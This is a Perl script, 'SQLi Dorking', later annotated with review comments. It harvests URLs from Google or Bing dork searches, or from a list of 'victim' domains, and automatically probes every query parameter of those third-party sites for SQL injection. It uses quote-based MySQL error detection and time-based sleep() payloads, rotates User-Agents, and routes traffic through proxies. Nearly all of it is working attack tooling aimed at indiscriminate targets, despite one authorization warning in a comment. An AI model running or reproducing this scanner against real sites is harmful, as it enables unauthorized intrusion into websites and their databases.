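#!/usr/bin/perl
#################################
# SQLi Dorking #
# Autor: Crozz Cyborg #
# #
# Copyright 2013 Crozz Cyborg #
#################################
#
# Pulls candidate URLs out of Google/Bing search results (or out of a
# domain list) and probes every query-string parameter of each URL for
# MySQL error strings and for time-based (sleep) SQL injection.
#
# NOTE(review): this script sends injection payloads to third-party hosts.
# Run it only against systems you are explicitly authorized to test.  The
# search engines also rate-limit or block the source IP (LinksByDork
# handles Google's "unusual traffic" page interactively).
use strict;
use warnings;
$| = 1;                       # unbuffered STDOUT so the progress bar and spinner redraw
$SIG{'INT'} = \&Interrupt;    # Ctrl-C opens the proxy/dork/quit menu instead of aborting
# Modules
use HTTP::Request;
use LWP::UserAgent;
use Getopt::Long;
use Benchmark;
use POSIX;
use threads;
use Time::HiRes "usleep";
# Variables
# One of these is picked at random as the User-Agent of every request (see Navegar).
my @UserAgents = (
    'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0',
    'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:22.0) Gecko/20130328 Firefox/22.0',
    'Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20130405 Firefox/22.0',
    'Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))',
    'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)',
    'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14',
    'Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14',
    'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14');
# Command-line options.  -gd and -bd are mutually exclusive (checked in main);
# -p is required with either of them.
my ($Dork,$BingDork,$List,$NumPaginas,$FileLinks,$Proxy);
my $proceso;    # assigned in LinksByDork, never read anywhere else in this file
my $result = GetOptions(
    'gd=s'  => \$Dork,          # Google dork
    'bd=s'  => \$BingDork,      # Bing dork
    'l=s'   => \$List,          # file with one domain per line
    'p=s'   => \$NumPaginas,    # number of result pages to fetch
    'f=s'   => \$FileLinks,     # log file for findings
    'prx=s' => \$Proxy);        # host:port of an HTTP proxy for the search queries
# An unknown or malformed option was previously ignored; show usage instead.
Uso() unless $result;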
- # INI Funciones
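# Prints the usage text and exits via die.  Called whenever the option
# combination is invalid or -p is missing.  The text previously advertised a
# "-d" switch that GetOptions does not define; it now lists -gd/-bd and -prx,
# matching the options actually parsed.  (The empty "()" prototype is dropped:
# it only declared that the sub takes no arguments, which is already the case.)
sub Uso {
    die <<EOTXT;
\rUso: $0 [-gd dork | -bd dork] -p <paginas> [-l archivo.txt] [-f archivo] [-prx host:puerto]
    -gd <Dork>
        Google Dork
    -bd <Bing>
        Bing Dork
    -l <Archivo>
        Archivo con links para analizar
    -p <paginas>
        Numero de paginas para buscar
    -f <archivo>
        Archivo donde se guardaran los logs
    -prx <host:puerto>
        Proxy HTTP para las consultas al buscador
Ejemplo: $0 -gd inurl:product.php?id= -p 3
Mas informacion escribe: perldoc $0
EOTXT
}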
# Collects result links from Google (when $Dork is set) or Bing (when
# $BingDork is set) for result pages 0..$NumPaginas inclusive (one page more
# than the number requested), keeps only links that carry a "name=value"
# query string, percent-decodes them, rewrites https:// to http://, and
# returns the list de-duplicated by path via EliminarRep.
# Reads the globals $Dork, $BingDork, $NumPaginas and $Proxy; sets $proceso.
# NOTE(review): the two result-link regexes were written against the
# search-result markup of the time (2013); if either engine changes its HTML
# this returns an empty list without any error.
sub LinksByDork(){
my @Links;
# Result offset sent to the engine: 0 for Google's start=, 1 for Bing's first=.
my $Paginas = $Dork ? 0 : 1;
my ($carga,$porcentaje) = ("",0);
$proceso = 'dork';
print "Dork: $Dork$BingDork\n";
foreach(my $pag = 0;$pag <= $NumPaginas;$pag++){
my ($HTML,$Link,@Data);
# Progress bar: 50 cells, one '=' per 2%.
printf("\r[%-50s] %3i%%",$carga,$porcentaje < 100 ? ceil($porcentaje) : floor($porcentaje));
$porcentaje += (100/$NumPaginas);
$carga = "=" x ($porcentaje < 100 ? ceil($porcentaje)/2 : floor($porcentaje)/2);
if($Dork){
$HTML = &Navegar('http://www.google.com/search?q='.$Dork.'&start='.$Paginas,$Proxy);
}
elsif($BingDork){
$HTML = &Navegar('http://www.bing.com/search?q='.$BingDork.'&first='.$Paginas,$Proxy);
}
# Google's automated-traffic block page.  Ask the operator: (C) re-runs the
# same dork on Bing, (Q) stops and returns what was collected, anything else
# re-requests the same page.
if($HTML =~ m/Our systems have detected unusual traffic from your computer/i){
# NOTE(review): $1 is printed even when this match fails, in which case it
# still holds the capture of an earlier successful match.
$HTML =~ /IP address\: (\S+)\<br/i;
print "\rDetectado trafico \"inusual\" de la IP $1\ncambiala para continuar [(C)ambiar a Bing/(Q)uitar/Continuar[Enter]] ";
chomp(my $CQ = <STDIN>);
if($CQ =~ /q/i){
# $#Links > 0 is true only with at least two links, so a single collected
# link is discarded and the script exits instead of returning it.
if($#Links > 0){
@Links = &EliminarRep(@Links);
return @Links
}else{exit}
}
elsif($CQ =~ /c/i){
$BingDork = $Dork;
$Dork = 0;
$Paginas += 1;   # shift the 0-based Google offset onto Bing's 1-based first=
$HTML = &Navegar('http://www.bing.com/search?q='.$BingDork.'&first='.$Paginas,$Proxy);
}
else{
print "Continuando...\n";
$pag--;   # retry this page on the next iteration
next
}
}
# Extract the result hrefs: Google wraps targets as /url?q=<target>&sa=U&...,
# Bing puts them directly in <h3><a href="...">.
if($Dork){
@Data = $HTML =~ m/href="\/url\?q=([-.:%?=&\/\w]+)\&sa=U&/gi;
}
elsif($BingDork){
@Data = $HTML =~ /<h3><a href="([-.:%?=&\/\w]+)"/mgi;
}
# Keep a link only if it is not on the engines' own domains and has at least
# one "name=value" pair, either raw or percent-encoded (%3F...%3D...).
foreach $Link(@Data){
if($Link !~ m/google.com/i && $Link !~ m/googleusercontent.com/i && $Link !~ m/msn.com/i && ($Link =~ m/\%3[fF]\w+%3[dD]\w+/ || $Link =~ /\?\w+=\w+/)){
$Link =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;   # percent-decode
# NOTE(review): forcing http:// means every probe in SQL() goes in clear
# text, and HTTPS-only sites will answer with a redirect or error page.
$Link =~ s/https:\/\//http:\/\//g;
push(@Links,$Link);
}
}
$Paginas += 10;   # advance the offset to the next result page
}
print "\n\n";
@Links = &EliminarRep(@Links);
return @Links
}
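# Reads one domain per line from the file named by $List and runs a
# "site:<domain>" Bing dork for each one, returning the concatenated link
# lists.  Forces $NumPaginas to 15 pages per domain.
# Dies when the list file cannot be opened; the original two-argument open
# failed silently and the scan then reported "no vulnerable pages".  Blank
# lines are skipped instead of being searched as a bare "site:".
sub LinksByList {
    my @Links;
    $NumPaginas = 15;
    open(my $list_fh, '<', $List) or die "No se puede abrir el archivo '$List': $!\n";
    while (my $domain = <$list_fh>) {
        chomp $domain;
        next if $domain =~ /^\s*$/;
        $BingDork = "site:$domain";
        push(@Links, LinksByDork());
    }
    close($list_fh);
    return @Links;
}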
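# Fetches $URL with a single GET and returns the raw response body.  The HTTP
# status is not checked: whatever body came back is returned as-is.
#   $URL      - absolute http:// URL
#   $UseProxy - optional "host:port"; when given, requests go through it as
#               an HTTP proxy
# A random entry of @UserAgents is sent as User-Agent, the socket timeout is
# 10 seconds and the connection is closed after the request.
# Fixes: the Host header is only pinned when the URL actually matches (the
# original used $1 unconditionally, which reuses a stale capture), and the
# host character class now includes '-' (a host such as "my-shop.example"
# previously produced "Host: my").  The empty "()" prototype is dropped; it
# declared that the sub takes no arguments, which contradicted the @_ use.
sub Navegar {
    my ($URL, $UseProxy) = @_;
    my $UA = LWP::UserAgent->new;
    $UA->agent($UserAgents[int(rand($#UserAgents + 1))]);
    $UA->timeout(10);
    if ($URL =~ m{^http://([\w.-]+)/*}) {
        $UA->default_header('Host' => $1);
    }
    $UA->default_header('Accept' => 'text/html');
    $UA->default_header('Accept-Language' => 'en-US,en;q=0.5');
    $UA->default_header('DNT' => '1');
    $UA->default_header('Connection' => 'close');
    $UA->proxy('http' => "http://$UseProxy") if $UseProxy;
    my $Req  = HTTP::Request->new(GET => $URL);
    my $Resp = $UA->request($Req);
    return $Resp->content();
}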
# Probes every query-string parameter of $Link, in two stages per parameter:
#   1. append "'" to the value and look for MySQL error text in the body;
#   2. otherwise take the time of that request as a baseline and send two
#      sleep() payloads; a response that takes at least baseline+20 seconds
#      is reported.
# Returns an array ref [link, parameter, payload, seconds] on the first hit,
# or 0 when nothing was found or the baseline alone took 40 s or more.
# Runs inside a worker thread (see main).  Navegar is called here without
# $Proxy, so the probe requests go direct even when -prx is given; only the
# search-engine queries use the proxy.
sub SQL(){
my $Link = shift;
# $Edit[0] is everything before the first '?', $Edit[1] the query string
# (anything after a second '?' is dropped).
my @Edit = split('\?',$Link); # Split the query string off the URL
my @Variables = split('&',$Edit[1]); # Split into name=value pairs
# NOTE: split('=') has no limit, so a value containing '=' is split again
# and shifts the name/value pairing for everything after it.
my %Vars = map {split('=',$_)} @Variables; # Store name => value in %Vars
my $LinkMod;
my @HTML = (undef) x 3;   # only element 0 is ever used
foreach my $Var(keys %Vars){
# @Variables is flattened into ModLink's argument list here.
$LinkMod = &ModLink($Edit[0],@Variables,$Var," '"); # Rebuild the link with the "'" payload in parameter $Var
my $time1 = new Benchmark;
$HTML[0] = &Navegar($LinkMod);
my $time2 = new Benchmark;
my $timeAv = timediff($time2,$time1);   # element 0 of a Benchmark object is the wall-clock seconds
if($HTML[0] =~ m/You have an error in your SQL syntax/i){
my @Ret = ($Link,$Var,"'",$$timeAv[0]);
return \@Ret;
}
elsif($HTML[0] =~ m/supplied argument is not a valid MySQL/i){
my @Ret = ($Link,$Var,"'",$$timeAv[0]);
return \@Ret;
}
# Baseline too slow to measure a sleep() delta: give up on this link.
return 0 if($$timeAv[0] >= 40);
# A slow baseline (10-39 s) is clamped to 40, so the sleep and the
# detection threshold below both become 60 s.
$$timeAv[0] = 40 if($$timeAv[0] >= 10);
# NOTE(review): Navegar sets a 10 s LWP timeout, shorter than the 20 s+
# delay requested here, so a request that really sleeps is cut off at
# roughly the timeout and the measured time is capped by it -- confirm
# against LWP's timeout semantics before relying on this branch.
foreach(("' and sleep(".($$timeAv[0]+20).") and '1' = '1"," and sleep(".($$timeAv[0]+20).") and 1 = 1")){
$LinkMod = &ModLink($Edit[0],@Variables,$Var,$_);
my $time1 = new Benchmark;
$HTML[0] = &Navegar($LinkMod);
my $time2 = new Benchmark;
my $timedif = timediff($time2,$time1);
# Report it if the round trip grew by at least the requested sleep.
if($$timedif[0] >= ($$timeAv[0]+20)){
my @Ret = ($Link,$Var,$_,$$timedif[0]);
return \@Ret;
}
}
}
return 0
}
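# Rebuilds "$Host?name=value&..." with $Code appended (after a space) to the
# value of parameter $Var.  Called as ModLink($Host, @Variables, $Var, $Code)
# with the "name=value" pairs flattened into the argument list, so the last
# two arguments are taken first and everything in between is the pair list.
#   $Host      - URL up to, not including, the '?'
#   @Variables - "name=value" pairs in their original order
#   $Var       - name of the parameter to modify
#   $Code      - text appended to that parameter's value
# Returns the rebuilt URL ($Host alone when there are no pairs, as before).
# Fixes: the original "my @Variables = shift" took only the first pair, so
# any URL with two or more parameters was reassembled wrongly.  Pairs are
# kept in their original order (the original iterated a hash, i.e. random
# order), values containing '=' are preserved, and the empty "()" prototype
# that contradicted the @_ use is dropped.
sub ModLink {
    my $Host      = shift;
    my $Code      = pop;
    my $Var       = pop;
    my @Variables = @_;
    my @parts;
    foreach my $pair (@Variables) {
        my ($name, $value) = split('=', $pair, 2);   # limit 2: keep '=' inside values
        $value = '' unless defined $value;
        push @parts, ($name eq $Var) ? "$name=$value $Code" : "$name=$value";
    }
    return $Host unless @parts;
    return $Host . '?' . join('&', @parts);
}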
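# Drops links whose path (everything before the first '?') has already been
# seen, keeping the first occurrence and the original order.  Replaces the
# quadratic splice loop with one pass over a seen-set; the result is the same.
#   @_ - list of URLs (may be empty)
# Returns the de-duplicated list.  The empty "()" prototype is dropped.
sub EliminarRep {
    my %seen;
    return grep {
        my $path = (split(/\?/, $_))[0];
        $path = '' unless defined $path;
        !$seen{$path}++;
    } @_;
}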
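# Appends one line to the log file.
#   $_[0] - reference to the scalar holding the log file name
#   $_[1] - the line to write (a newline is added)
# When the file cannot be opened it reports the error and prompts STDIN for a
# new name, storing it back through the reference so the next call uses it;
# the current line is not retried (same as before).
# Uses three-argument open and a lexical handle so that a file name starting
# with '>' or '|' cannot change the open mode, and checks close() so that a
# buffered write failure is not lost silently.
sub Logs {
    my ($file_ref, $line) = @_;
    if (open(my $log_fh, '>>', $$file_ref)) {
        print {$log_fh} "$line\n";
        close($log_fh) or warn "No se puede escribir en el archivo '$$file_ref' $!\n";
    }
    else {
        print "No se puede escribir en el archivo '$$file_ref' $!";
        print "Especifica otro archivo: ";
        chomp($$file_ref = <STDIN>);
    }
}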
# SIGINT handler: instead of aborting, show a small menu on STDIN to swap the
# proxy, swap the Google dork, or exit.  Any other answer prints "Opcion
# invalida" and the scan simply resumes.
sub Interrupt(){
	print "\n\n1) Cambiar proxy\n2) Cambiar dork\n3) Salir\n\n\$> ";
	chomp(my $opcion = <STDIN>);
	if($opcion == 1){
		print "Nuevo proxy: ";
		chomp($Proxy = <STDIN>);
		return;
	}
	if($opcion == 2){
		print "Nueva dork: ";
		chomp($Dork = <STDIN>);
		return;
	}
	if($opcion == 3){
		print "Finalizando\n";
		exit;
	}
	print "Opcion invalida\n";
}
- # End Funciones
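# Entry point: collects candidate links (from the -gd/-bd dork or the -l
# list), scans each one in a worker thread while a spinner runs, prints every
# finding as it happens (and appends it to the -f log), then prints a summary
# table and fires a desktop notification.
# Fixes: notify-send is run with the list form of system(), so the message is
# never handed to a shell; the "Escaneando N links" header is printed for a
# single link too (the original tested $#Links > 0, i.e. at least two); the
# unreachable "$Dork inside elsif($BingDork)" check is removed.
sub main {
    my @Links;
    my @LinkSQLi;
    my @t  = (4, 8, 10);                    # column widths: Link, Var, Payload
    my @c  = ("\e[1;32m", "\e[0;32m");      # alternating row colours
    my $nc = 0;
    print "Obteniendo links...";
    if ($Dork) {
        Uso() unless $NumPaginas;
        if ($BingDork) {
            print "\rSolamente puedes usar un buscador!\n";
            Uso();
        }
        print "\n";
        push(@Links, LinksByDork());
    }
    elsif ($BingDork) {
        Uso() unless $NumPaginas;
        print "\n";
        push(@Links, LinksByDork());
    }
    elsif ($List) {
        print "\n";
        push(@Links, LinksByList());
    }
    else {
        Uso();
    }
    print "Escaneando " . scalar(@Links) . " links...\n\n" if @Links;
    foreach my $link (@Links) {
        # SQL() blocks on network round trips; run it in a thread so the
        # spinner below can keep redrawing.
        my $thr1 = threads->create(\&SQL, $link);
        while ($thr1->is_running()) {
            for my $frame ("/", "-", "\\", "|") {
                print $frame;
                usleep(80_000);
                print "\b";
            }
        }
        my $Datos = $thr1->join();
        next unless $Datos;
        # Widen the summary columns to the longest value seen.
        foreach my $col (0 .. 2) {
            $t[$col] = length($$Datos[$col]) if $t[$col] < length($$Datos[$col]);
        }
        printf("Link: %s Var: %s Payload: %s Time: %s\n", $$Datos[0], $$Datos[1], $$Datos[2], $$Datos[3]);
        &Logs(\$FileLinks, "Link: $$Datos[0] Var: $$Datos[1] Payload: $$Datos[2]") if $FileLinks;
        push(@LinkSQLi, $Datos);
    }
    if (@LinkSQLi) {
        print "\n" x 5;
        printf("+%s+%s+%s+\n", "-" x $t[0], "-" x $t[1], "-" x $t[2]);
        printf("|\e[0;33mLink%s\e[0m|\e[0;33mVar%s\e[0m|\e[0;33mPayload%s\e[0m|\n", " " x ($t[0] - 4), " " x ($t[1] - 3), " " x ($t[2] - 7));
        printf("+%s+%s+%s+\n", "-" x $t[0], "-" x $t[1], "-" x $t[2]);
        foreach my $row (@LinkSQLi) {
            printf("|$c[$nc % 2]%-${t[0]}s\e[0m|$c[$nc % 2]%-${t[1]}s\e[0m|$c[$nc % 2]%-${t[2]}s\e[0m|\n", $$row[0], $$row[1], $$row[2]);
            $nc++;
        }
        printf("+%s+%s+%s+\n", "-" x $t[0], "-" x $t[1], "-" x $t[2]);
        # List form: no shell is involved, so the arguments are passed verbatim.
        system("notify-send", "SQLi Dorking", "Escaneo finalizado con " . scalar(@LinkSQLi) . " vulnerables", "-t", "10000");
    }
    else {
        print "No se encontraron paginas vulnerables\n";
    }
}
main();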
- __END__
- =head1 Nombre
- SQLi Dorking
- =head1 Version
- Version: 1.0 Beta
- =head1 Autor
- Crozz Cyborg
- =head1 Descripcion
Busca paginas vulnerables a inyeccion SQL (usa Google o Bing, o una lista de dominios)
- =head1 Uso
sqliDorking.pl [-gd/-bd <dork>] -p <paginas> [-l Links.txt] [-f Logs.txt] [-prx host:puerto]
- =head2 Opciones
- -gd <Dork>
- Google Dork
- -bd <Bing>
- Bing Dork
- -l <Archivo>
- Archivo con links para analizar
- -p <paginas>
- Numero de paginas para buscar
- -f <archivo>
- Archivo donde se guardaran los logs
- =head2 Ejemplos de uso
- sqliDorking.pl -gd inurl:product.php?id= -p 3 -f VulneSQL.txt
- sqliDorking.pl -l links.txt -f VulneSQL.txt
- sqliDorking.pl -bd inurl:product.php?id= -p 3
- sqliDorking.pl -l links.txt
- =head2 Archivo Links.txt
- El archivo links.txt puede tener cualquier otro nombre, en cuanto al formato debe de tener 1 nombre de dominio por linea, ejemplo de dominio: victima.com